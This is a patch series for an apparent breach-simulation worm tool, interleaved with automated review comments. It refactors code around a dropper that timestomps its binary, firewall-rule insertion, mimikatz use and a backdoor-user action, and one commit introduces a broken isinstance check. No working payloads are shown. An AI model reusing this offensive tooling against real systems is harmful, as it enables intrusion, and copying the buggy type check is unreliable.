@@ -30,7 +30,6 @@ class PTHReportService(object): } """ - pipeline = [ {"$match": { 'NTLM_secret': { @@ -55,7 +54,7 @@ class PTHReportService(object): :param admin_on_machines: A list of "monkey" documents "_id"s :param domain_name: The admins' domain name :return: - A list of formatted machines names *domain*\*hostname*, to use in shared admins issues. + A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. """ machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) return [domain_name + '\\' + i['hostname'] for i in list(machines)] @@ -108,7 +107,7 @@ class PTHReportService(object): 'username': user['name'], 'domain_name': user['domain_name'], 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if user['machine_id'] else None - } for user in doc['Docs'] + } for user in doc['Docs'] ] users_cred_groups.append({'cred_groups': users_list}) @@ -144,7 +143,8 @@ class PTHReportService(object): { 'name': admin['name'], 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], admin['domain_name']) + 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], + admin['domain_name']) } for admin in admins ] @@ -153,11 +153,11 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + 'is_local': False, + 'type': 'shared_admins_domain', + 'machine': admin['domain_name'], + 'username': admin['domain_name'] + '\\' + admin['name'], + 'shared_machines': admin['admin_on_machines'], } for admin in admins_info] 
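Review bot: The docstring change in `__get_admin_on_machines_format` (second hunk) now contradicts the code: it promises `*domain*/*hostname*` but the return expression two lines below still builds `domain_name + '\\' + i['hostname']`, i.e. a backslash-separated `DOMAIN\hostname`, and `get_shared_admins_issues` in the last hunk uses the same `'\\'` separator for `username`. The original `\*` was presumably an attempt to write the backslash that reST-style emphasis swallowed; the accurate fix is to keep the backslash and escape it for the docstring, e.g. `A list of formatted machine names ``domain\\hostname``, to use in shared admins issues.` (or make the docstring a raw string). Documentation that describes the wrong separator is worse than none for anyone matching these strings downstream.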
@@ -262,7 +262,7 @@ class PTHReportService(object): return { 'nodes': PTHReportService.generate_map_nodes(), 'edges': PTHReportService.generate_edges() - } + } @staticmethod def get_report(): @@ -283,4 +283,3 @@ class PTHReportService(object): } return report - diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index cf59ae7df..58dff1f5a 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -65,11 +65,18 @@ def local_ip_addresses(): # The subnets list should not change often. Therefore, we can cache the result and never call this function # more than once. This stopgap measure is here since this function is called a lot of times during the report # generation. -# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. +# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. @lru(maxsize=1) def get_subnets(): subnets = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - subnets.extend([ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network for link in addresses if link['addr'] != '127.0.0.1']) + subnets.extend( + [ + ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network + for link + in addresses + if link['addr'] != '127.0.0.1' + ] + ) return subnets From 4b0ea4aed7629636158eb729cc112e56aa6cd904 Mon Sep 17 00:00:00 2001 
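Review bot: The comprehension in `get_subnets` (utils.py hunk) excludes loopback only by the literal string `'127.0.0.1'`, so any other 127/8 address bound to an interface, or the loopback address written differently, still ends up in the cached subnet list that report generation uses. Since the block already goes through `ipaddress`, the robust form is `if not ipaddress.ip_address(link['addr']).is_loopback`, which also drops the exact-string comparison. The `@lru(maxsize=1)` cache means any such stray entry persists until the Island is restarted, as the rewrapped comment above notes.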
From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:31 +0200 Subject: [PATCH 25/53] Variable names and const location fixes --- monkey/infection_monkey/control.py | 2 +- monkey/infection_monkey/dropper.py | 5 +++-- monkey/infection_monkey/network/firewall.py | 6 +++--- monkey/infection_monkey/network/info.py | 11 +++++------ monkey/infection_monkey/transport/http.py | 10 ++++------ monkey/monkey_island/cc/environment/environment.py | 4 ++-- monkey/monkey_island/cc/models/monkey.py | 2 +- monkey/monkey_island/cc/services/config.py | 12 ++++++------ monkey/monkey_island/cc/services/edge.py | 6 +++--- monkey/monkey_island/cc/services/node.py | 6 +++--- 10 files changed, 31 insertions(+), 33 deletions(-) diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 54d528976..b063744ad 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -304,7 +304,7 @@ class ControlClient(object): try: target_addr, target_port = my_proxy.split(':', 1) target_port = int(target_port) - except: + except ValueError: return None else: proxy_class = HTTPConnectProxy diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index ee1194035..0fc6dd10a 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -26,6 +26,7 @@ else: try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = IOError __author__ = 'itamar' @@ -103,14 +104,14 @@ class MonkeyDrops(object): dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) - except OSError as exc: + except OSError: LOG.warning("Cannot set reference date using '%s', file not found", dropper_date_reference_path) else: try: os.utime(self._config['destination_path'], (ref_stat.st_atime, ref_stat.st_mtime)) - except: + except OSError: LOG.warning("Cannot set reference date to destination file") monkey_options =\ 
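Review bot: Narrowing to `except ValueError:` in `ControlClient` (control.py hunk) covers the two failures this body can raise — no `':'` in `my_proxy` so the unpack fails, and a non-numeric port — but if `my_proxy` can ever be `None` or bytes (cannot be told from the hunk), `split` now raises `AttributeError`/`TypeError` that the old bare except silently turned into `return None`. A one-line comment saying why only `ValueError` is expected, e.g. `# my_proxy is "host:port" from the proxy discovery above; anything else is a bug`, would make the intent explicit; the enclosing method continues outside the hunk.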
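Review bot: In `MonkeyDrops` (dropper.py hunk) the `except OSError:` around `os.stat(dropper_date_reference_path)` still logs `"... file not found"`, but `OSError` also covers permission denied and similar, so the warning will misreport the cause; the commit dropped the `as exc` binding that would have let the message say what happened. Keep the exception and log it: `except OSError as exc:` / `LOG.warning("Cannot set reference date using '%s': %s", dropper_date_reference_path, exc)`, and do the same for the `os.utime` branch so a failed timestomp of the dropped binary is diagnosable. The method body starts and ends outside the hunk.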
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 06d98dcbd..3b0161bbb 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -25,7 +25,7 @@ class FirewallApp(object): def __enter__(self): return self - def __exit__(self, type, value, traceback): + def __exit__(self, exc_type, value, traceback): self.close() def close(self): @@ -49,9 +49,9 @@ class WinAdvFirewall(FirewallApp): except: return None - def add_firewall_rule(self, name="Firewall", dir="in", action="allow", program=sys.executable, **kwargs): + def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): netsh_args = {'name': name, - 'dir': dir, + 'dir': direction, 'action': action, 'program': program} netsh_args.update(kwargs) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index cc198312c..2d7b981f5 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,6 +16,11 @@ from infection_monkey.utils.environment import is_windows_os # Timeout for monkey connections TIMEOUT = 15 +LOOPBACK_NAME = b"lo" +SIOCGIFADDR = 0x8915 # get PA address +SIOCGIFNETMASK = 0x891b # get network PA mask +RTF_UP = 0x0001 # Route usable +RTF_REJECT = 0x0200 def get_host_subnets(): @@ -62,12 +67,6 @@ else: def get_routes(): # based on scapy implementation for route parsing - LOOPBACK_NAME = b"lo" - SIOCGIFADDR = 0x8915 # get PA address - SIOCGIFNETMASK = 0x891b # get network PA mask - RTF_UP = 0x0001 # Route usable - RTF_REJECT = 0x0200 - try: f = open("/proc/net/route", "r") except IOError: diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..7650cb229 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py 
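Review bot: Renaming the keyword parameter `dir` to `direction` in `WinAdvFirewall.add_firewall_rule` changes the call signature, and a caller still passing `dir="out"` will not fail loudly: the keyword is absorbed by `**kwargs` and `netsh_args.update(kwargs)` then overwrites the `'dir'` entry derived from `direction`, so the old spelling keeps working only by accident and a typo in either name is accepted silently. Either document in a docstring that extra kwargs are passed through verbatim as netsh keys, or check for the collision: `if 'dir' in kwargs: raise TypeError("use 'direction', not 'dir'")`. The bare `except: return None` in the context above (`is_enabled`, presumably) is untouched by this commit and still hides every error from the netsh call.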
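Review bot: Hoisting `LOOPBACK_NAME`, `SIOCGIFADDR`, `SIOCGIFNETMASK`, `RTF_UP` and `RTF_REJECT` to module level in info.py is reasonable, but these are Linux ioctl/route-flag values and the module is also imported on Windows (see the `is_windows_os` import and the `else:` branch), so a comment such as `# Linux-only ioctl numbers and /proc/net/route flags (see scapy's route parsing)` would stop someone reusing them elsewhere. In the `get_routes` body visible in the same hunk, `f = open("/proc/net/route", "r")` is not a `with` statement and the rest of the function is outside the hunk; if the remaining body does not close `f` on every path, `with open("/proc/net/route") as f:` inside the `try` fixes that. The `except IOError:` branch is cut off, so I cannot tell whether a missing file is handled or swallowed.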
@@ -64,7 +64,6 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 - f = None try: f = monkeyfs.open(self.filename, 'rb') except IOError: @@ -100,10 +99,10 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.end_headers() return f, start_range, end_range - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), self.log_date_time_string(), - format % args)) + format_string % args)) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): @@ -117,7 +116,6 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): def do_CONNECT(self): # just provide a tunnel, transfer the data with no modification req = self - reqbody = None req.path = "https://%s/" % req.path.replace(':443', '') u = urlsplit(req.path) @@ -148,9 +146,9 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): update_last_serve_time() conn.close() - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format % args)) + (self.address_string(), self.log_date_time_string(), format_string % args)) class HTTPServer(threading.Thread): diff --git a/monkey/monkey_island/cc/environment/environment.py b/monkey/monkey_island/cc/environment/environment.py index 6115e8dd9..868e6ec36 100644 --- a/monkey/monkey_island/cc/environment/environment.py +++ b/monkey/monkey_island/cc/environment/environment.py 
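Review bot: Removing the `f = None` initialiser before the `try:` in `FileServHTTPRequestHandler` (first hunk) is only safe if the `except IOError:` branch, which lies outside the hunk, returns or raises; if it merely logs and falls through, the later `return f, start_range, end_range` (visible in the second hunk) raises `UnboundLocalError` instead of returning the `None` it presumably returned before. Please confirm the except branch ends in a `return`, or keep the initialiser with a comment: `f = None  # stays None when the file cannot be opened`. The `log_message` renames are fine because `BaseHTTPRequestHandler` invokes the method positionally.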
@@ -34,8 +34,8 @@ def load_server_configuration_from_file(): def load_env_from_file(): - config_json = load_server_configuration_from_file() - return config_json['server_config'] + loaded_config_json = load_server_configuration_from_file() + return loaded_config_json['server_config'] try: diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 1a0e872f6..c257ae298 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -132,7 +132,7 @@ def is_monkey(object_id): try: _ = Monkey.get_single_monkey_by_id(object_id) return True - except: + except MonkeyNotFoundError: return False diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 09771302d..641da8055 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -144,7 +144,7 @@ class ConfigService: if should_encrypt: try: ConfigService.encrypt_config(config_json) - except KeyError as e: + except KeyError: logger.error('Bad configuration file was submitted.') return False mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) @@ -154,9 +154,9 @@ class ConfigService: @staticmethod def init_default_config(): if ConfigService.default_config is None: - defaultValidatingDraft4Validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) config = {} - defaultValidatingDraft4Validator(SCHEMA).validate(config) + default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @staticmethod 
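Review bot: In `is_monkey` (monkey.py hunk) narrowing to `except MonkeyNotFoundError:` is the right direction, but if `Monkey.get_single_monkey_by_id` can raise anything else for a malformed `object_id` (for instance a validation error on an ID that is not a valid ObjectId — not visible here), that now propagates from a predicate that callers such as `get_edge_label` treat as a plain boolean. Please confirm the helper maps every "no such monkey" case onto `MonkeyNotFoundError`, or note the contract in a docstring: `"""Return True if object_id refers to a Monkey document; only MonkeyNotFoundError is treated as False."""`. In the config.py hunk, dropping `as e` on the `KeyError` leaves `logger.error('Bad configuration file was submitted.')` with no indication of which key was missing; `logger.exception(...)` there costs nothing and logs only the key name, not the submitted config.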
@@ -207,15 +207,15 @@ class ConfigService: # Do it only for root. if instance != {}: return - for property, subschema in list(properties.items()): + for property1, subschema1 in list(properties.items()): main_dict = {} - for property2, subschema2 in list(subschema["properties"].items()): + for property2, subschema2 in list(subschema1["properties"].items()): sub_dict = {} for property3, subschema3 in list(subschema2["properties"].items()): if "default" in subschema3: sub_dict[property3] = subschema3["default"] main_dict[property2] = sub_dict - instance.setdefault(property, main_dict) + instance.setdefault(property1, main_dict) for error in validate_properties(validator, properties, instance, schema): yield error diff --git a/monkey/monkey_island/cc/services/edge.py b/monkey/monkey_island/cc/services/edge.py index bf9417309..b026fa480 100644 --- a/monkey/monkey_island/cc/services/edge.py +++ b/monkey/monkey_island/cc/services/edge.py @@ -141,7 +141,7 @@ class EdgeService: @staticmethod def get_edge_label(edge): - NodeService = monkey_island.cc.services.node.NodeService + node_service = monkey_island.cc.services.node.NodeService from_id = edge["from"] to_id = edge["to"] @@ -153,9 +153,9 @@ class EdgeService: if is_monkey(to_id): to_label = get_monkey_label_by_id(to_id) else: - to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id)) + to_label = node_service.get_node_label(node_service.get_node_by_id(to_id)) - RIGHT_ARROW = "\u2192" return "%s %s %s" % (from_label, RIGHT_ARROW, to_label) +RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 0c0a873e8..da45509d7 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py 
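Review bot: `RIGHT_ARROW = "\u2192"` in edge.py is now defined at module level but placed after the `EdgeService` class, at the very bottom of the file; it works because `get_edge_label` only resolves the name at call time, but a reader scanning the top of the module for constants will not find it, and a future top-level use of `RIGHT_ARROW` inside the class body (e.g. a class attribute) would fail with `NameError`. Move it up next to the imports with a short comment: `RIGHT_ARROW = "\u2192"  # separator in edge labels, "from -> to"`. The `NodeService` to `node_service` rename is a local alias for a class and is fine, although lowercase suggests an instance; `node_service_cls` or keeping the class name would read more honestly.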
@@ -56,9 +56,9 @@ class NodeService: accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for exploit in edge["exploits"]: - exploit["origin"] = from_node_label - exploits.append(exploit) + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label + exploits.append(edge_exploit) exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) From fd70ecfe29980d0b44c2d4c38f56df17a3ec3de9 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:52 +0200 Subject: [PATCH 26/53] Intentional shadowing of builtins --- monkey/infection_monkey/monkeyfs.py | 1 + monkey/infection_monkey/system_info/__init__.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index b65443c76..e64682501 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -52,6 +52,7 @@ def virtual_path(name): return "%s%s" % (MONKEYFS_PREFIX, name) +# noinspection PyShadowingBuiltins def open(name, mode='r', buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index ab8e0f7ba..7d4395af7 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__) try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied __author__ = 'uri' From f8b38d9a8d6d5a4ce9f774c462a8c3f9e07074cb Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:05 +0200 Subject: [PATCH 27/53] Change is to isisntance for type checking --- monkey/infection_monkey/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6b01761d1..f3936fe19 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -74,7 +74,7 @@ class Configuration(object): val_type = type(value) - if val_type is types.FunctionType or val_type is types.MethodType: + if isinstance(val_type, types.FunctionType) or isinstance(val_type, types.MethodType): continue if val_type in (type, ABCMeta): From 719088070e752774e3b1d17a57c33f3ed81f4353 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:19 +0200 Subject: [PATCH 28/53] Added todo --- monkey/infection_monkey/system_info/windows_info_collector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 08ca6ff29..2c3696f44 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -35,7 +35,7 @@ class WindowsInfoCollector(InfoCollector): """ LOG.debug("Running Windows collector") super(WindowsInfoCollector, self).get_info() - #self.get_wmi_info() + # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration if WormConfiguration.should_use_mimikatz: From 6992902991de7189472a981bd5111c694da1e39f Mon Sep 17 00:00:00 2001 From: Shivank Date: Mon, 28 Oct 2019 22:53:07 +0530 Subject: [PATCH 29/53] JS File-saver dependency patch --- monkey/monkey_island/cc/ui/package.json | 1 - .../cc/ui/src/components/pages/ConfigurePage.js | 7 +++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index 4da085836..bc63bfccb 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json 
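Review bot: The new condition in `Configuration` (config.py hunk) can never be true: `val_type` is `type(value)`, a type object, and `isinstance(val_type, types.FunctionType)` asks whether that type object is itself a function, which it is not, so functions and methods are no longer skipped by the `continue` and fall through to the `val_type in (type, ABCMeta)` check and whatever follows. The original identity test was correct for this shape; either restore `if val_type is types.FunctionType or val_type is types.MethodType:` or test the value rather than its type, `if isinstance(value, (types.FunctionType, types.MethodType)):`, which is what the commit title intended. The enclosing method starts and ends outside the hunk, so whatever it does with the surviving attributes (configuration serialisation, presumably) now sees callables as well.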
@@ -75,7 +75,6 @@ "fetch": "^1.1.0", "file-saver": "^2.0.2", "filepond": "^4.2.0", - "js-file-download": "^0.4.4", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", "moment": "^2.22.2", diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..a5aeae3ec 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import fileDownload from 'js-file-download'; +import FileSaver from "file-saver"; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,7 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - fileDownload(JSON.stringify(this.state.configuration, null, 2), 'monkey.conf'); + const JSONString = JSON.stringify(this.state.configuration, null, 2); + const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + + FileSaver.saveAs(blob, 'monkey.conf'); }; sendConfig() { From 797b6c58b9035431c4d6c42d5448e51f3933ba90 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:41:35 +0200 Subject: [PATCH 30/53] Removed some unused imports --- monkey/common/cloud/aws_service_test.py | 1 - monkey/infection_monkey/post_breach/actions/add_user.py | 1 - monkey/monkey_island/cc/environment/aws.py | 1 - monkey/monkey_island/cc/resources/version_update.py | 1 - monkey/monkey_island/cc/services/remote_run_aws.py | 1 - monkey/monkey_island/cc/services/reporting/report.py | 1 - .../cc/services/telemetry/zero_trust_tests/machine_exploited.py | 1 - 7 files changed, 7 deletions(-) 
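Review bot: `exportConfig` now builds the download as `new Blob([JSONString], {type: "text/plain;charset=utf-8"})` although the content is JSON; `type: "application/json;charset=utf-8"` is the honest media type and is what `FileSaver.saveAs` passes through to the browser. The exported `monkey.conf` contains the full `this.state.configuration`, which in this project can include credentials used by the exploiters (not visible in this hunk, so treat as an assumption); that was already true with `js-file-download`, but a one-line comment such as `// exported file contains the complete configuration, including any stored credentials` would warn the next maintainer. Dropping the `js-file-download` dependency in package.json is fine since `file-saver` was already listed.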
diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index 25d1b8b6e..ae9c4b5d3 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -3,7 +3,6 @@ from .aws_service import filter_instance_data_from_aws_response import json - __author__ = 'shay.nehmad' diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py index 09c8d4796..074e31460 100644 --- a/monkey/infection_monkey/post_breach/actions/add_user.py +++ b/monkey/infection_monkey/post_breach/actions/add_user.py @@ -13,4 +13,3 @@ class BackdoorUser(PBA): POST_BREACH_BACKDOOR_USER, linux_cmd=' '.join(linux_cmds), windows_cmd=windows_cmds) - diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index 797a395aa..18db5c376 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,6 @@ import monkey_island.cc.auth from monkey_island.cc.environment import Environment from common.cloud.aws_instance import AwsInstance -from Crypto.Hash import SHA3_512 __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 5b34f4206..b1fbfdf82 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -2,7 +2,6 @@ import flask_restful import logging from monkey_island.cc.environment.environment import env -from monkey_island.cc.auth import jwt_required from monkey_island.cc.services.version_update import VersionUpdateService __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 4ec1fd427..c81e0bc4a 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py 
@@ -1,6 +1,5 @@ import logging -from monkey_island.cc.services.config import ConfigService from common.cloud.aws_instance import AwsInstance from common.cloud.aws_service import AwsService from common.cmd.aws.aws_cmd_runner import AwsCmdRunner diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 01be940c4..6a44679a4 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,7 +12,6 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.edge import EdgeService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 454f3a7fe..59ba296cd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,5 +1,4 @@ from common.data.zero_trust_consts import * -from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From f430bfb940e07ee41a9badc1d13e9bc2362d4980 Mon Sep 17 00:00:00 2001 
From: Shay Nehmad Date: Mon, 28 Oct 2019 20:43:01 +0200 Subject: [PATCH 31/53] Changed info to debug in tests --- monkey/monkey_island/cc/models/test_monkey.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 5d81e0b1d..3c10ca7d7 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -142,7 +142,7 @@ class TestMonkey(IslandTestCase): cache_info_after_query_1 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_1.hits, 0) self.assertEqual(cache_info_after_query_1.misses, 1) - logger.info("1) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("1) ID: {} label: {}".format(linux_monkey.id, label)) self.assertIsNotNone(label) self.assertIn(hostname_example, label) @@ -150,7 +150,7 @@ class TestMonkey(IslandTestCase): # should be cached label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("2) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("2) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_2 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_2.hits, 1) self.assertEqual(cache_info_after_query_2.misses, 1) @@ -160,7 +160,7 @@ class TestMonkey(IslandTestCase): # should be a miss label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("3) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("3) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_3 = Monkey.get_label_by_id.storage.backend.cache_info() logger.debug("Cache info: {}".format(str(cache_info_after_query_3))) # still 1 hit only From 75bff2264925a9251bd403c10bbb0a82d24a97ee Mon Sep 17 00:00:00 2001 
From: Shay Nehmad Date: Mon, 28 Oct 2019 20:59:30 +0200 Subject: [PATCH 32/53] Changed import * to explicit imports --- monkey/common/network/segmentation_utils_test.py | 2 +- .../infection_monkey/exploit/tools/payload_parsing_test.py | 1 - monkey/infection_monkey/exploit/web_rce.py | 3 ++- monkey/infection_monkey/utils/users.py | 2 -- .../cc/models/zero_trust/test_aggregate_finding.py | 2 +- monkey/monkey_island/cc/models/zero_trust/test_finding.py | 2 +- .../cc/services/reporting/test_zero_trust_service.py | 7 ++++++- .../cc/services/reporting/zero_trust_service.py | 5 ++++- .../cc/services/telemetry/processing/__init__.py | 7 ------- .../cc/services/telemetry/processing/post_breach.py | 2 +- .../cc/services/telemetry/processing/processing.py | 3 ++- .../services/telemetry/zero_trust_tests/data_endpoints.py | 3 ++- .../telemetry/zero_trust_tests/machine_exploited.py | 2 +- 13 files changed, 21 insertions(+), 20 deletions(-) diff --git a/monkey/common/network/segmentation_utils_test.py b/monkey/common/network/segmentation_utils_test.py index 221f1d9bf..9dea1af19 100644 --- a/monkey/common/network/segmentation_utils_test.py +++ b/monkey/common/network/segmentation_utils_test.py @@ -1,4 +1,4 @@ -from common.network.network_range import * +from common.network.network_range import CidrRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 23358a290..315216d5f 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -29,4 +29,3 @@ class TestPayload(TestCase): array2[1] == "prefix5678suffix" and len(array2) == 2) assert test1 and test2 - 
